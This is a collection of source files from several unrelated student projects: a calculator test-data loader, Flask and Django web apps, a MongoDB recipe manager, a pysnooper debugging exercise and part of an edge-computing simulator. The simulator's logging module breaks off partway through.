metadata | text
---|---|
{
"source": "jinhongtan/Calculator",
"score": 3
} |
#### File: Calculator/src/read_data.py
```python
import pandas as pd
from Calculator import *
#AddictionPath = 'C:\Users\<NAME>\PycharmProjects\Calculator\venv\UnitTestAddition.csv'
basePath = "/code/src/"
AdditionPath = basePath + "data/UnitTestAddition.csv"
SubtractionPath = basePath + "data/UnitTestSubtraction.csv"
MultiplicationPath = basePath + "data/UnitTestMultiplication.csv"
SquareRootPath = basePath + "data/UnitTestSquareRoot.csv"
SquarePath = basePath + "data/UnitTestSquare.csv"
DivisionPath = basePath + "data/UnitTestDivision.csv"
def read_data(TestDataPath):
data= pd.read_csv(TestDataPath)
df = pd.DataFrame(data, columns=['Value 1','Value 2','Result'])
return df
def read_square(TestDataPath):
data= pd.read_csv(TestDataPath)
df = pd.DataFrame(data, columns=['Value 1','Result'])
return df
``` |
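A minimal usage sketch for the loader above. It is not part of the original repository: the temporary CSV, its contents, and the import path are assumptions made only so the example is self-contained (note that importing `read_data.py` also pulls in the `Calculator` package, which must be importable).
```python
# Hypothetical usage sketch (not from the repo): builds a tiny CSV and loads it.
import os
import tempfile

import pandas as pd

from read_data import read_data  # assumes src/ is on the Python path

tmp_dir = tempfile.mkdtemp()
addition_csv = os.path.join(tmp_dir, "UnitTestAddition.csv")
pd.DataFrame({"Value 1": [1, 2], "Value 2": [3, 4], "Result": [4, 6]}).to_csv(
    addition_csv, index=False)

df = read_data(addition_csv)
print(df.columns.tolist())  # ['Value 1', 'Value 2', 'Result']
print(df.shape)             # (2, 3)
```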
{
"source": "jinhongtan/is601Final",
"score": 3
} |
#### File: is601Final/app/app.py
```python
import simplejson as json
from flask import Flask, request, Response, redirect, url_for
from flask import render_template
from flaskext.mysql import MySQL
from pymysql.cursors import DictCursor
from forms import SignupForm
app = Flask(__name__,
template_folder="templates",
static_folder="static",
static_url_path='')
mysql = MySQL(cursorclass=DictCursor)
app.config.from_object('config.Config')
@app.route('/', methods=['GET'])
def index():
user = {'username': 'Michael'}
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers')
result = cursor.fetchall()
return render_template('index.html', title='Home', user=user, players=result)
@app.route('/view/<int:player_id>', methods=['GET'])
def record_view(player_id):
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers WHERE id=%s', player_id)
result = cursor.fetchall()
return render_template('view.html', title='View Form', player=result[0])
@app.route('/edit/<int:player_id>', methods=['GET'])
def form_edit_get(player_id):
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers WHERE id=%s', player_id)
result = cursor.fetchall()
return render_template('edit.html', title='Edit Form', player=result[0])
@app.route('/edit/<int:player_id>', methods=['POST'])
def form_update_post(player_id):
cursor = mysql.get_db().cursor()
inputData = (request.form.get('plName'), request.form.get('plTeam'), request.form.get('plPosition'),
request.form.get('plHeight'), request.form.get('plWeight'),
request.form.get('plAge'), player_id)
sql_update_query = """UPDATE mlbPlayers t SET t.plName = %s, t.plTeam = %s, t.plPosition = %s, t.plHeight =
%s, t.plWeight = %s, t.plAge = %s WHERE t.id = %s """
cursor.execute(sql_update_query, inputData)
mysql.get_db().commit()
return redirect("/", code=302)
@app.route('/player/new', methods=['GET'])
def form_insert_get():
return render_template('new.html', title='New MLB Player Form')
@app.route('/player/new', methods=['POST'])
def form_insert_post():
cursor = mysql.get_db().cursor()
inputData = (request.form.get('plName'), request.form.get('plTeam'), request.form.get('plPosition'),
request.form.get('plHeight'), request.form.get('plWeight'),
request.form.get('plAge'))
sql_insert_query = """INSERT INTO mlbPlayers (plName,plTeam, plPosition, plHeight, plWeight,
plAge) VALUES (%s,%s, %s,%s, %s,%s)"""
cursor.execute(sql_insert_query, inputData)
mysql.get_db().commit()
return redirect("/", code=302)
@app.route('/delete/<int:player_id>', methods=['POST'])
def form_delete_post(player_id):
cursor = mysql.get_db().cursor()
sql_delete_query = """DELETE FROM mlbPlayers WHERE id = %s """
cursor.execute(sql_delete_query, player_id)
mysql.get_db().commit()
return redirect("/", code=302)
@app.route('/api/v1/players', methods=['GET'])
def api_browse() -> str:
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers')
result = cursor.fetchall()
json_result = json.dumps(result)
resp = Response(json_result, status=200, mimetype='application/json')
return resp
@app.route('/api/v1/players/<int:player_id>', methods=['GET'])
def api_retrieve(player_id) -> str:
cursor = mysql.get_db().cursor()
cursor.execute('SELECT * FROM mlbPlayers WHERE id=%s', player_id)
result = cursor.fetchall()
json_result = json.dumps(result)
resp = Response(json_result, status=200, mimetype='application/json')
return resp
@app.route('/api/v1/players/<int:player_id>', methods=['PUT'])
def api_edit(player_id) -> str:
cursor = mysql.get_db().cursor()
content = request.json
inputData = (content['plName'], content['plTeam'], content['plPosition'],
content['plHeight'], content['plWeight'],
content['plAge'], player_id)
sql_update_query = """UPDATE mlbPlayers t SET t.plName = %s, t.plTeam = %s, t.plPosition = %s, t.plHeight =
%s, t.plWeight = %s, t.plAge = %s WHERE t.id = %s """
cursor.execute(sql_update_query, inputData)
mysql.get_db().commit()
resp = Response(status=200, mimetype='application/json')
return resp
@app.route('/api/v1/players', methods=['POST'])
def api_add() -> str:
content = request.json
cursor = mysql.get_db().cursor()
inputData = (content['plName'], content['plTeam'], content['plPosition'],
content['plHeight'], content['plWeight'],
content['plAge'])
sql_insert_query = """INSERT INTO mlbPlayers (plName,plTeam, plPosition, plHeight, plWeight,
plAge) VALUES (%s,%s, %s,%s, %s,%s) """
cursor.execute(sql_insert_query, inputData)
mysql.get_db().commit()
resp = Response(status=201, mimetype='application/json')
return resp
@app.route('/api/v1/players/<int:player_id>', methods=['DELETE'])
def api_delete(player_id) -> str:
cursor = mysql.get_db().cursor()
sql_delete_query = """DELETE FROM mlbPlayers WHERE id = %s """
cursor.execute(sql_delete_query, player_id)
mysql.get_db().commit()
resp = Response(status=200, mimetype='application/json')
return resp
@app.route('/signup', methods=['GET', 'POST'])
def signup_page():
return render_template(
'/signup.html',
title='Create an Account | Flask-Login Tutorial.',
form=SignupForm(),
template='signup-page',
body="Sign up for a user account."
)
@app.route("/signin")
def dashboard():
# This had to serve a static page b/c of how tutorial made the route
return redirect('/dashboard.html')
@app.route("/login")
def login():
return redirect(url_for('dashboard'))
@app.errorhandler(404)
def not_found(arg):
"""Page not found."""
return render_template('404.html', title='404 error.', message='Page Not Found')
@app.errorhandler(400)
def bad_request(arg):
"""Bad request."""
return render_template('400.html', title='400 error.', message='Bad request. Page Not Found')
@app.errorhandler(500)
def server_error(arg):
"""Internal server error."""
return render_template('500.html', message='Server Error')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
``` |
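The JSON endpoints above form a small CRUD API. The sketch below exercises them with `requests`; it is not part of the project and assumes the app is already running on localhost:5000 with the MySQL table `mlbPlayers` (including an auto-increment `id` column) in place.
```python
# Hypothetical client sketch for the /api/v1/players endpoints above.
import requests

BASE = "http://localhost:5000/api/v1/players"

player = {"plName": "Jane Doe", "plTeam": "NYY", "plPosition": "SS",
          "plHeight": 70, "plWeight": 180, "plAge": 27}

requests.post(BASE, json=player)                  # api_add -> 201 Created
players = requests.get(BASE).json()               # api_browse -> list of row dicts
player_id = players[-1]["id"]

player["plTeam"] = "BOS"
requests.put(f"{BASE}/{player_id}", json=player)  # api_edit -> 200 OK
requests.delete(f"{BASE}/{player_id}")            # api_delete -> 200 OK
```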
{
"source": "jinhongtan/jobtest",
"score": 2
} |
#### File: jobtest/ResumeSearch/views.py
```python
from django.shortcuts import render, redirect
from django.db import models
from django import forms
from . import models
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from django.conf import settings
from django.core.mail import send_mail as sm
app_name = "ResumeSearch"
from django.contrib.auth.decorators import login_required
import datetime
from . models import user, industry, skill, job
from .forms import UserForm, RegisterForm
import hashlib
from itsdangerous import SignatureExpired
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from urllib.parse import unquote
from django.urls import reverse
from django.core import serializers
def hash_code(s, salt='ResumeSearch'):
h = hashlib.sha256()
s += salt
h.update(s.encode())
return h.hexdigest()
def login(request):
if request.session.get('is_login', None):
return redirect('/index')
if request.method == "POST":
login_form = UserForm(request.POST)
if login_form.is_valid():
username = request.POST.get('username')
password = request.POST.get('password')
if username and password: # make sure neither the username nor the password is empty
username = username.strip()
# validate the characters in the username
# validate the password length
# more validation could go here ...
try:
user = models.user.objects.get(name=username)
if user.password == hash_code(password):
request.session['is_login'] = True
request.session['user_id'] = user.id
request.session['user_name'] = user.name
return redirect(reverse('index'))
#return render(request, "index.html", {'username':username})
else:
message = "Password incorrect !"
except models.user.DoesNotExist:
message = 'user does not exist'
#return render(request, 'index.html')
login_form = UserForm()
return render(request, 'login.html', locals())
def register(request):
if request.session.get('is_login', None):
# registering while logged in is not allowed; you can change this rule!
return redirect("/index/")
if request.method == "POST":
register_form = RegisterForm(request.POST)
message = "Please check the information you entered!"
if register_form.is_valid(): # get the cleaned data
username = register_form.cleaned_data['username']
password1 = register_form.cleaned_data['password1']
password2 = register_form.cleaned_data['password2']
email = register_form.cleaned_data['email']
if password1 != password2: # check that the two passwords match
message = "The two passwords do not match!"
return render(request, 'register.html', locals())
else:
same_name_user = models.user.objects.filter(name=username)
if same_name_user: # username must be unique
message = 'This user already exists; please choose another username!'
return render(request, 'register.html', locals())
same_email_user = models.user.objects.filter(email=email)
if same_email_user: # email address must be unique
message = 'This email address is already registered; please use another one!'
return render(request, 'register.html', locals())
# everything is OK, create the new user
new_user = models.user.objects.create()
new_user.name = username
new_user.password = hash_code(<PASSWORD>)
new_user.email = email
new_user.save()
return redirect('/login/') # automatically redirect to the login page
register_form = RegisterForm()
return render(request, 'register.html', locals())
def logout(request):
if not request.session.get('is_login', None):
# if the user is not logged in, there is nothing to log out of
return redirect("/index/")
request.session.flush()
# or use the following instead
# del request.session['is_login']
# del request.session['user_id']
# del request.session['user_name']
return redirect("/index/")
def test_ajax(request):
# res = {"code": 101, "msg": "invalid request"}
# # check whether this is an ajax request; if not, return "invalid request"
# if request.is_ajax():
# try:
# res["code"] = 100
# res["msg"] = 'request succeeded'
# except Exception:
# res["msg"] = 'invalid request'
#return HttpResponse("res")
if request.method == 'POST':
Job = request.POST.get("job")
Mainjob = request.POST.get("mainjob")
Input = request.POST.get("input")
text='this is text'
print(Mainjob.split('/'))
#link = request.get_full_path()
#print(link)
#job = request.GET.get('job', '')
#mainjob = request.GET.get('mainjob','')
#city=request.GET.get('city','')
print("This is Job:"+Job)
print("This is Mainjob:" +Mainjob)
print("This is input:" + Input)
message={}
jobs = job.objects.filter(title__icontains=Input)
data = serializers.serialize("json", jobs)
jsonjobs = {'jobs': data}
#jobs = job.objects.filter(title__icontains=keyword, location__icontains=city)
return JsonResponse(jsonjobs)
def index(request):
#if request.session.get('is_login', None):
jobs = job.objects.all()
return render(request, 'index.html', {'jobs': jobs, "register": "Register", "login": "Log in"})
#else:
#return render(request, 'index.html')
def detail(request, slug):
jobs = job.objects.get(slug=slug)
return render(request, 'details.html', {'jobs': jobs})
def search_job(request):
if request.is_ajax():
#link = request.get_full_path()
#print(link)
job_kw = request.POST.get('job', '')       # renamed so the local does not shadow the job model
mainjob = request.POST.get('mainjob', '')
input_kw = request.POST.get('input', '')   # renamed so the local does not shadow the builtin input
#city=request.GET.get('city','')
print(job_kw)
print(mainjob)
print(input_kw)
jobs = job.objects.filter(title__icontains=job_kw)
#jobs = job.objects.filter(title__icontains=keyword, location__icontains=city)
return render(request, 'index.html', {'jobs': jobs})
``` |
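The password handling above stores `hash_code(password)` at registration and compares the same digest at login. The standalone sketch below mirrors that scheme with `hashlib` only, to make the comparison explicit; it re-declares the function rather than importing it from the project.
```python
# Mirrors the hash_code scheme used by login()/register() above (standalone copy).
import hashlib

def hash_code(s, salt='ResumeSearch'):
    h = hashlib.sha256()
    h.update((s + salt).encode())
    return h.hexdigest()

stored = hash_code("my-password")            # what register() persists
assert hash_code("my-password") == stored    # what login() checks
assert hash_code("wrong-password") != stored
```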
{
"source": "jinhopark8345/ICC",
"score": 3
} |
#### File: icc/iccdb/db_manage.py
```python
from pymongo import MongoClient
from iccjson.jconnect import validate_json, get_schema
from iccjson.jconnect import make_temp_ing_info, make_temp_user_ing, make_temp_recipe
class IccDB:
"""
DB class for Icc
"""
def __init__(self, db_name):
self.client = MongoClient()
self.db = self.client[db_name]
self.user_ing = self.db.user_ing
self.recipe = self.db.recipe
self.ing_info = self.db.ing_info
def add_ing_info(self, ing_info):
"""add ing to ing_info
Args:
ing: ingredient to be added to user_ing
ing_example = {"onion", "fridge", "1440"}
Returns:
-1: invalid schema
-2: ing_info already exist in the DB
"""
# check if the format is correct
ing_info_schema = get_schema("ing_info")
if not validate_json(ing_info, ing_info_schema):
# temporary sol, need to change
return -1
# check if the ingredient exists on db already
if self.ing_info.find_one({"name": ing_info["name"]}) is None:
return self.ing_info.insert_one(ing_info)
else:
# ingredient already exist
print("add_ing_info error: {}, already exist".format(ing_info))
return -2
def update_ing_info(self, ing):
pass
def delete_ing_info(self, ing_name):
return self.ing_info.delete_many({"name": ing_name})
def add_user_ing(self, user_ing):
# check if the format is correct
user_info_schema = get_schema("user_ing")
if not validate_json(user_ing, user_info_schema):
# temporary sol, need to change
return -1
# check if the ingredient exists on db already
if self.user_ing.find_one({"name": user_ing["name"]}) is None:
return self.user_ing.insert_one(user_ing)
else:
# ingredient already exist
return -2
def add_temp_user_ing(self):
# clean db
self.db.drop_collection("user_ing")
user_ings = make_temp_user_ing()
for user_ing in user_ings:
# print(recipe)
rtv = self.add_user_ing(user_ing)
if rtv in (-1, -2):
print("add_recipe error code : {}".format(rtv))
def update_user_ing(self, ing):
"""update user_ing quantity if user has the ing,
if not, then add the whole ing to user_ing
Args:
ing: ingredient to be added to user_ing
ing_example = {"onion", 600, "g", "2020-10-07 13:34"}
Returns:
"""
# https://docs.mongodb.com/manual/reference/operator/update/
# $inc is update operators
# The *upsert* option can be used to create the document if it
# doesn't already exist. when ingredient is updated, _id doesn't
# get added to the ingredient
if (self.user_ing.find_one_and_update(
{"name": ing["name"]},
{"$inc": {
"quantity": ing["quantity"]
}},
upsert=False,
) is None):
# since find_one_and_update doesn't add other properties
# than name and quantity, should insert whole new
# ingredient into user_ing
self.user_ing.insert_one(ing)
def print_user_ing(self):
for ing in self.user_ing.find({}):
print(ing)
def delete_user_ing(self, ing_name):
self.user_ing.delete_one({"name": ing_name})
def add_recipe(self, recipe):
"""add recipe to db.recipe
Args:
recipe: ingredient to be added to user_ing
ing_example = {"onion", "fridge", "1440"}
Returns:
-1 : returned when the recipe does not match the recipe schema.
-2 : returned when a recipe with the same name already exists in the
recipe collection.
otherwise : the pymongo insert result for the newly added recipe.
"""
recipe_schema = get_schema("recipe")
if not validate_json(recipe, recipe_schema):
# temporary sol, need to change
return -1
# check if the recipe exists on db already
if self.recipe.find_one({"name": recipe["name"]}) is None:
return self.recipe.insert_one(recipe)
# recipe already exist
else:
return -2
def delete_recipe(self, recipe_name):
return self.recipe.delete_many({"name": recipe_name})
def replace_recipe_ings(self, recipe):
""" replace existing ing in recipe with new ing.
Args:
recipe: type is dict. It includes the recipe name, the like count, and the
ings list (each entry has name, quantity and quantity_unit).
recipe_example :
{
"name":
"rice cake soup",
"like":
7,
"ings": [{
"name": "green onion",
"quantity": 500,
"quantity_unit": "g"
}]
}
Returns:
"""
return self.recipe.find_one_and_update({"name": recipe["name"]},
{"$set": {
"ings": recipe["ings"]
}},
upsert=False)
def replace_recipe_like(self, recipe):
""" replace existing like in recipe with new like.
Args:
replace existing ing in recipe with new ing.
Returns:
"""
return self.recipe.find_one_and_update({"name": recipe["name"]},
{"$set": {
"like": recipe["like"]
}},
upsert=False)
def update_recipe_like(self, recipe_name, like=1, replace_flag=False):
"""update value of like in recipe when replace_flag is False.
when replace_flag is True, replace value of like in recipe with value of like as args.
Args:
recipe_name: type is string.
like: type is integer.
replace_flag: Optional;
Returns:
"""
recipe = self.find_recipe(recipe_name)
if not replace_flag:
# like
recipe["like"] += like
# replace the like value
else:
recipe["like"] = like
self.replace_recipe_like(recipe)
def add_recipe_ing(self, recipe_name, ing):
"""add ing in ings of recipe to db.recipe
Args:
recipe_name: type is string.
ing: type is dict. ingredient to be added to ing in recipe.
ing_example = {"onion", "fridge", "1440"}
Returns:
"""
recipe = self.find_recipe(recipe_name)
### Next SAIDS: need to add schema test
recipe["ings"].append(ing)
self.replace_recipe_ings(recipe)
def delete_recipe_ing(self, recipe_name, ing_name):
"""delete ing in ings of recipe to db.recipe
Args:
recipe_name: type is string.
ing_name: type is string. ingredient to be deleted to ing in ings of recipe.
Returns:
"""
recipe = self.find_recipe(recipe_name)
recipe["ings"] = [ing for ing in recipe["ings"] if ing["name"] != ing_name]
self.replace_recipe_ings(recipe)
def update_recipe_ing(self, recipe_name, ing, replace_flag=False):
"""update value of ing_quantity in ing of recipe when replace_flag is False.
when replace_flag is True, replace value of ing_quantity in ing of recipe with value of ing as args.
Args:
recipe_name: type is string.
ing: type is dict.
replace_flag: Optional;
Return:
"""
recipe = self.find_recipe(recipe_name)
for db_ing in recipe["ings"]:
if db_ing["name"] == ing["name"]:
if not replace_flag:
db_ing["quantity"] += ing["quantity"]
else:
db_ing["quantity"] = ing["quantity"]
self.replace_recipe_ings(recipe)
def find_ing_info(self, ing_name):
"""find ing_info in db.ing_info
Args:
ing_name: type is string.
Returns:
ing_info: type is dict.
"""
ing = self.ing_info.find_one({"name": ing_name})
# return None if ing doesn't exist on DB
return ing
def find_user_ing(self, ing_name, return_id=True):
"""find user_ing in db.user_ing.
if return_id is True, include the MongoDB _id in the result; otherwise exclude it.
Args:
ing_name: type is string.
return_id: optional; defaults to True.
Returns:
ing: type is dict.
"""
if return_id is False:
# find_one will find the object and return the object with id(default)
ing = self.user_ing.find_one({"name": ing_name}, {"_id": False})
return ing
else:
ing = self.user_ing.find_one({"name": ing_name})
return ing
def find_recipe(self, recipe_name, return_id=True):
"""find recipe in db.recipe.
if return_id is True, include the MongoDB _id in the result; otherwise exclude it.
Args:
recipe_name: type is string.
return_id: optional; defaults to True.
Returns:
recipe: type is dict.
"""
if return_id is False:
# find_one will find the object and return the object with id(default)
recipe = self.recipe.find_one({"name": recipe_name}, {"_id": False})
return recipe
else:
recipe = self.recipe.find_one({"name": recipe_name})
return recipe
def find_recipes(self, return_id=True):
"""find all recipes in db.recipe.
if return_id is True, include the MongoDB _id in each result; otherwise exclude it.
Args:
return_id: optional; defaults to True.
Returns:
recipes: a list of dicts.
"""
cursor = self.recipe # choosing the collection you need
recipes = []
if return_id is False:
for recipe in cursor.find({}, {"_id": False}):
recipes.append(recipe)
else:
for recipe in cursor.find({}):
recipes.append(recipe)
return recipes
def find_recipe_ing(self, recipe_name, ing_name, return_id=True):
"""find ing of recipe in db.recipe.
if return_id is True, look the recipe up with its MongoDB _id included; otherwise exclude it.
Args:
recipe_name: type is string.
ing_name: type is string.
return_id: optional; defaults to True.
Returns:
ing: type is dict.
"""
if return_id is False:
# find_one will find the object and return the object with id(default)
recipe = self.recipe.find_one({"name": recipe_name}, {"_id": False})
for ing in recipe["ings"]:
if ing["name"] == ing_name:
return ing
else:
recipe = self.recipe.find_one({"name": recipe_name})
for ing in recipe["ings"]:
if ing["name"] == ing_name:
return ing
def find_user_ings(self, return_id=True):
"""find all user_ings in db.user_ing.
if return_id is True, include the MongoDB _id in each result; otherwise exclude it.
Args:
return_id: optional; defaults to True.
Returns:
user_ings: a list of dicts.
"""
user_ings = []
if return_id is False:
for user_ing in self.user_ing.find({}, {"_id": False}):
user_ings.append(user_ing)
else:
for user_ing in self.user_ing.find({}):
user_ings.append(user_ing)
return user_ings
def find_ing_infos(self, return_id=False):
"""find all ing_infos in db.ing_info.
if return_id is True, include the MongoDB _id in each result; otherwise exclude it.
Args:
return_id: optional; defaults to False.
Returns:
ing_infos: a list of dicts.
"""
ing_infos = []
if return_id is False:
for ing_info in self.ing_info.find({}, {"_id": False}):
ing_infos.append(ing_info)
else:
for ing_info in self.ing_info.find({}):
ing_infos.append(ing_info)
return ing_infos
def add_temp_recipe(self):
self.db.drop_collection("recipe")
recipes = make_temp_recipe()
for recipe in recipes:
# print(recipe)
temp = self.add_recipe(recipe)
if temp in (-1, -2):
print("add_recipe error code : {}".format(temp))
def add_temp_ing_info(self):
# clean db
self.db.drop_collection("ing_info")
ing_infos = make_temp_ing_info()
for ing_info in ing_infos:
# print(recipe)
rtv = self.add_ing_info(ing_info)
if rtv in (-1, -2):
print("add_recipe error code : {}".format(rtv))
```
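`IccDB.update_user_ing` relies on `find_one_and_update` with a `$inc` modifier and falls back to `insert_one` when the ingredient is missing. The sketch below shows just that pattern with bare pymongo; it assumes a local MongoDB instance, and the database/collection names are illustrative, not the project's.
```python
# Minimal pymongo sketch of the "$inc or insert" pattern behind update_user_ing.
from pymongo import MongoClient

client = MongoClient()                      # assumes a local mongod
user_ing = client["icc_sketch"].user_ing    # illustrative names

ing = {"name": "onion", "quantity": 600, "quantity_unit": "g"}

# Bump the quantity if the ingredient already exists ...
if user_ing.find_one_and_update({"name": ing["name"]},
                                {"$inc": {"quantity": ing["quantity"]}},
                                upsert=False) is None:
    # ... otherwise insert the whole document, as update_user_ing does.
    user_ing.insert_one(ing)

print(user_ing.find_one({"name": "onion"}, {"_id": False}))
```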
#### File: ICC/icc/main.py
```python
from flask import Flask, render_template
app = Flask(__name__)
from iccjson.jconnect import *
from recommend.compare_recipe import *
from recommend.recommend_recipe import *
from iccdb.db_manage import *
from gui.main_gui import *
def main_t():
icc_db = IccDB("icc")
icc_db.add_temp_recipe()
icc_db.add_temp_user_ing()
icc_db.add_temp_ing_info()
recommended_recipe = recommed_recipe()
print("you should make {}".format(recommended_recipe))
app = ICC_GUI()
# print("before user ings {}".format(icc_db.find_user_ings(returnID=False)))
# remove_recipe_ing_from_user_ing(recommended_recipe)
# print("after user ings {}".format(icc_db.find_user_ings(returnID=False)))
# remove_recipe_ing_from_user_ing(recommended_recipe)
# print("after user ings {}".format(icc_db.find_user_ings(returnID=False)))
pass
# main_t()
# import tkinter as tk
# class IccGUI(tk.Frame):
# def __init__(self, master=None):
# super().__init__(master)
# self.master = master
# self.pack()
# self.create_widgets()
# def create_widgets(self):
# self.hi_there = tk.Button(self)
# self.hi_there["text"] = "Hello World\n(click me)"
# self.hi_there["command"] = self.say_hi
# self.hi_there.pack(side="top")
# self.quit = tk.Button(self, text="QUIT", fg="red",
# command=self.master.destroy)
# self.quit.pack(side="bottom")
# def say_hi(self):
# print("hi there, everyone!")
# root = tk.Tk()
# app = IccGUI(master=root)
# app.mainloop()
@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
icc_db = IccDB("icc")
icc_db.add_temp_recipe()
icc_db.add_temp_user_ing()
icc_db.add_temp_ing_info()
recommended_recipe = recommed_recipe()
print("you should make {}".format(recommended_recipe))
ing_info = icc_db.find_ing_infos()
print(ing_info)
# client = MongoClient()
# db = client["icc"]
# temp = db.user_ing.find({})
# print(temp)
return render_template('index.html', data=ing_info)
if __name__ == '__main__':
app.run(port=5000)
# export FLASK_APP=main.py
# flask run
```
#### File: jinhopark8345/ICC/setup.py
```python
import os
import sys
import inspect
import platform
import threading
# ROOT_DIR = None
# def setup():
# main_id = None
# for t in threading.enumerate():
# if t.name == 'MainThread':
# main_id = t.ident
# break
# if not main_id:
# raise RuntimeError("Main thread exited before execution")
# current_main_frame = sys._current_frames()[main_id]
# base_frame = inspect.getouterframes(current_main_frame)[-1]
# if platform.system() == 'Windows':
# filename = base_frame.filename
# else:
# filename = base_frame[0].f_code.co_filename
# global ROOT_DIR
# ROOT_DIR = os.path.dirname(os.path.abspath(filename))
``` |
{
"source": "jinhopark8345/pysnooper-study",
"score": 3
} |
#### File: jinhopark8345/pysnooper-study/pysnooper-binary-search-example.py
```python
import pysnooper
import random
import logging
import threading
import time
from typing import List
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(2)
logging.info("Thread %s: finishing", name)
class Solution:
# @pysnooper.snoop(thread_info=True)
@pysnooper.snoop(thread_info=True)
def binary_search(self, nums: List[int], target:int) -> int:
left, right = 0, len(nums) -1
while left <= right:
mid = left + (right - left)
midnum = nums[mid]
if midnum == target:
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
# logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
# logging.info("Main : before running thread")
x.start()
# logging.info("Main : wait for the thread to finish")
# x.join()
# logging.info("Main : all done")
x.join()
return mid
elif midnum < target:
left = mid + 1
else:
right = mid - 1
return -1
Solution().binary_search([1,2,3,4,5], 2)
``` |
{
"source": "jinho-park/ECOS",
"score": 2
} |
#### File: ECOS/ecos/edge.py
```python
from ecos.log import Log
from ecos.simulator import Simulator
from ecos.event import Event
class Edge:
def __init__(self, id, props, policy, time):
self.CPU = props["mips"]
self.id = id
self.policy = policy
self.exec_list = list()
self.finish_list = list()
self.waiting_list = list()
self.previous_time = time
def get_policy(self):
return self.policy
def get_edge_id(self):
return self.id
def task_processing(self, task):
# calculate available resource
resourceUsage = 0
for running_task in self.exec_list:  # do not shadow the task being scheduled
resourceUsage += running_task.get_allocated_resource()
if self.CPU - resourceUsage > 0:
requiredResource = task.get_remain_size() / task.get_task_deadline()
task.set_allocated_resource(requiredResource)
self.exec_list.append(task)
msg = {
"task": "check",
"detail": {
"node": "edge",
"id": self.id
}
}
event = Event(msg, None, task.get_task_deadline())
Simulator.get_instance().send_event(event)
else:
self.waiting_list.append(task)
def update_task_state(self, simulationTime):
timeSpent = simulationTime - self.previous_time
for task in self.exec_list:
allocatedResource = task.get_allocated_resource()
remainSize = task.get_remain_size() - (allocatedResource * timeSpent)
task.set_remain_size(remainSize)
task.set_finish_node(1)
if len(self.exec_list) == 0 and len(self.waiting_list) == 0:
self.previous_time = simulationTime
for task in list(self.exec_list):  # iterate over a copy; finished tasks are removed inside the loop
if task.get_remain_size() <= 0:
self.exec_list.remove(task)
self.finish_list.append(task)
self.finish_task(task)
if len(self.waiting_list) > 0:
resourceUsage = 0
for task in self.exec_list:
resourceUsage += task.get_allocated_resource()
for task in list(self.waiting_list):  # iterate over a copy; promoted tasks are removed inside the loop
if resourceUsage <= 0:
break
requiredResource = task.get_remain_size() / task.get_task_deadline()
if requiredResource > resourceUsage:
break
task.set_allocated_resource(requiredResource)
task.set_buffering_time(Simulator.get_instance().get_clock(), 1)
resourceUsage -= requiredResource
self.exec_list.append(task)
self.waiting_list.remove(task)
# add event
nextEvent = 99999999999999
for task in self.exec_list:
remainingLength = task.get_remain_size()
estimatedFinishTime = (remainingLength / task.get_allocated_resource())
if estimatedFinishTime < 1:
estimatedFinishTime = 1
if estimatedFinishTime < nextEvent:
nextEvent = estimatedFinishTime
msg = {
"task": "check",
"detail": {
"node": "edge",
"id": self.id
}
}
event = Event(msg, None, nextEvent)
Simulator.get_instance().send_event(event)
def finish_task(self, task):
# 1 means edge node
task.set_finish_node(1)
task.set_processing_time(Simulator.get_instance().get_clock(), 1)
task.set_end_time(Simulator.get_instance().get_clock())
Log.get_instance().record_log(task)
self.finish_list.remove(task)
```
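The edge scheduler above reserves `remain_size / deadline` units of CPU per task and, on each `check` event, shrinks the remaining size by the allocated rate times the elapsed time. The sketch below walks through that arithmetic with made-up numbers; none of the values come from the ECOS configuration.
```python
# Illustrative walk-through of Edge.task_processing / Edge.update_task_state.
cpu_mips = 1000.0        # edge capacity (props["mips"]); assumed value
remain_size = 400.0      # task.get_remain_size(); assumed value
deadline = 2.0           # task.get_task_deadline(); assumed value

required = remain_size / deadline     # 200.0 MIPS reserved for this task
assert required <= cpu_mips           # otherwise the task goes to waiting_list

elapsed = 0.5                         # simulationTime - previous_time
remain_size -= required * elapsed     # 400 - 100 = 300 still to process
next_check = remain_size / required   # 1.5 -> delay of the next "check" event
print(required, remain_size, next_check)
```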
#### File: ECOS/ecos/event.py
```python
class Event:
def __init__(self, msg, task, time):
self.msg = msg
self.task = task
self.time = time
def get_message(self):
return self.msg
def get_task(self):
return self.task
def get_time(self):
return self.time
def update_time(self, _time):
self.time = _time
```
#### File: ECOS/ecos/log.py
```python
import json
import numpy as np
from enum import Enum
class Log:
_instance = None
@classmethod
def get_instance(cls):
if not cls._instance:
cls._instance = Log()
return cls._instance
def __init__(self):
# 2: Mobile, 1: Edge, 0: Cloud
self.device_type = {
"mobile": 2,
"edge": 1,
"cloud": 0
}
# lan: mobile-edge, man: edge-edge, wan: edge-cloud
# 0: gsm, 1: wan, 2: man, 3: lan
self.network_type = {
"lan": 1,
"man": 2,
"wan": 3
}
self.file_enable = True
self.file_name = ""
self.folder_path = ""
self.num_of_task_type = 0
self.completed_task = 0
self.completed_task_cloud = 0
self.completed_task_edge = 0
self.completed_task_mobile = 0
self.success_task = 0
self.network_delay = list()
self.network_delay_gsm = list()
self.network_delay_wan = list()
self.network_delay_man = list()
self.network_delay_lan = list()
self.service_time = list()
self.processing_time = list()
self.processing_time_cloud = list()
self.processing_time_edge = list()
self.processing_time_mobile = list()
self.buffering_time = list()
self.buffering_time_cloud = list()
self.buffering_time_edge = list()
self.buffering_time_mobile = list()
def get_service_time(self):
return self.service_time
def get_completed_task(self):
return self.completed_task
def sim_start(self, name):
# self.folder_path = file
self.file_name = name
def sim_stop(self):
if self.file_enable:
completed_task_sum = self.completed_task
completed_task_cloud_sum = self.completed_task_cloud
completed_task_edge_sum = self.completed_task_edge
completed_task_mobile_sum = self.completed_task_mobile
network_delay_avg = np.divide(sum(self.network_delay), len(self.network_delay),
out=np.zeros_like(sum(self.network_delay)),
where=len(self.network_delay) != 0,
casting="unsafe")
